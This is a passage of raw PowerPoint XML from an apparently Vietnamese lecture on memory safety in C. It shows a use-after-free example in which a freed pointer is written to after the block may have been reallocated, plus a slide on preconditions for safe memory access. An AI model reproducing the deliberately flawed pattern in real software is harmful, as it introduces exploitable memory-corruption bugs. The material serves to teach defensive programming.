                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>p = (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> *) malloc(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>sizeof</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>));</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="vi-VN" sz="1800" b="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>*</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>p</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="1800" b="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> = 0; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>		</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="1800" b="1">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>// OK</a:t>
            </a:r>
            <a:endParaRPr lang="vi-VN" sz="1800" b="1">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFFFF"/>
              </a:highlight>
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="vi-VN" sz="1800" b="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>free(p);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>p = 0;			</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>//Tại sao thao tác này là cần thiết?</a:t>
            </a:r>
            <a:endParaRPr lang="vi-VN" sz="1900" b="1">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90380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0CF3E3-E082-4064-8138-DCA28FA3DCB4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{B6F15528-21DE-4FAA-801E-634DDDAF4B2B}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>103</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{52648946-37AE-4DAC-956E-A44DBD9F18C9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="641074" y="566678"/>
            <a:ext cx="8178248" cy="2862322"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="C00000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>int x = 5;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="vi-VN" sz="1800" b="1">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="1800" b="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> *p;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>p = (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> *) malloc(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>sizeof</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>));</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="vi-VN" sz="1800" b="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>*</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>p</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="1800" b="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> = 0; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>		</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="1800" b="1">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>// OK</a:t>
            </a:r>
            <a:endParaRPr lang="vi-VN" sz="1800" b="1">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFFFF"/>
              </a:highlight>
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="vi-VN" sz="1800" b="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>free(p);</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" b="1">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFFFF"/>
              </a:highlight>
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>int **q = malloc(sizeof(int*)); //q có thể sẽ được cấp phát    				   //vùng nhớ vừa được giải phóng</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>*q = &amp;x;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>*p = 10;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>**q = 5; //runtime error</a:t>
            </a:r>
            <a:endParaRPr lang="vi-VN" sz="1800" b="1">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFFFF"/>
              </a:highlight>
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rectangle 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A6396B8B-A08C-4055-9799-B896FBDAF27B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="914400" y="38862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x</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Rectangle 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5C23D306-2C70-4A08-804E-1ECEA79E416E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="904461" y="4572000"/>
            <a:ext cx="685800" cy="45720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C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>p</a:t>
            </a:r>
            <a:endParaRPr lang="en-US">
              <a:solidFill>
                <a:srgbClr val="C00000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Rectangle 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{68B9DE26-508C-4152-A21E-8BFC68E7184D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="934278" y="5257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q</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="TextBox 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{003B77BE-C124-4BE2-B605-D64726FB8363}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="641074" y="5867400"/>
            <a:ext cx="1340126" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>stack</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Rectangle 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1713845A-B945-483C-B8AB-C82CE7732467}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3352800" y="4572000"/>
            <a:ext cx="685800" cy="457200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="008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0</a:t>
            </a:r>
            <a:endParaRPr lang="en-US">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="TextBox 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A2B2CF36-68BB-4382-A4E3-6F67C8EFE16C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3025637" y="5802868"/>
            <a:ext cx="1340126" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>heap</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="13" name="Straight Arrow Connector 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4E07046B-001E-4BAC-B708-93A70D502ADD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:stCxn id="7" idx="3"/>
            <a:endCxn id="10" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1590261" y="4800600"/>
            <a:ext cx="1762539" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">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D610C22D-C45B-4E3D-AE3F-DDB2C5DBB83D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="517248" y="3086100"/>
            <a:ext cx="3908563" cy="304800"/>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BCF0C0-94FC-4B9E-A15F-8756E9DC04A7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3375991" y="4558674"/>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10</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="16" name="Straight Arrow Connector 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{27E55043-BEAB-4270-8729-D8F197F935B3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="1620078" y="4989407"/>
            <a:ext cx="1785730" cy="4870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9CA9C8C3-140D-4F1A-833B-0921595D5EDB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="15" idx="0"/>
            <a:endCxn id="23" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="3718891" y="3927467"/>
            <a:ext cx="2453309" cy="6312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ED72709A-F876-4C98-AB89-7B3B7E474636}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6172200" y="366076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p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24" name="TextBox 23">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{61A0608D-786F-4A6E-AC88-A269F0BFA2E2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5943600" y="4176090"/>
            <a:ext cx="2494722" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Ô nhớ có địa chỉ là 10</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="31031404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A69E-49BD-42A7-A98C-A79262CE7BF9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Điều kiện truy cập bộ nhớ</a:t>
            </a:r>
            <a:endParaRPr lang="vi-VN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2FA13CA4-ED42-4B73-87EE-B1D23EDDC2A8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1143000"/>
            <a:ext cx="8229600" cy="5257800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Tiền điều kiện(precondition): điều kiện để câu lệnh/hàm đ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN"/>
              <a:t>ư</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>ợc thực thi đúng đắn</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> Hậu điều kiện(postcondition): khẳng định trạng thái đúng đắn của các đối t</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN"/>
              <a:t>ư</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>ợng khi lệnh/hàm kết thúc</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Cách thức xây dựng điều kiện:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="731520" lvl="1" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicParenR"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Xác định câu lệnh thực hiện thao tác truy cập bộ nhớ</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="731520" lvl="1" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicParenR"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Xác định các yêu cầu để truy cập đó là an toàn</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="731520" lvl="1" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicParenR"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Xác định những yêu cầu ở bước 2 đã đạt được do các câu lệnh lập trình khác</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="731520" lvl="1" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicParenR"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Các yêu cầu không đạt được ở bước 3 là điều kiện truy cập bộ nhớ</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
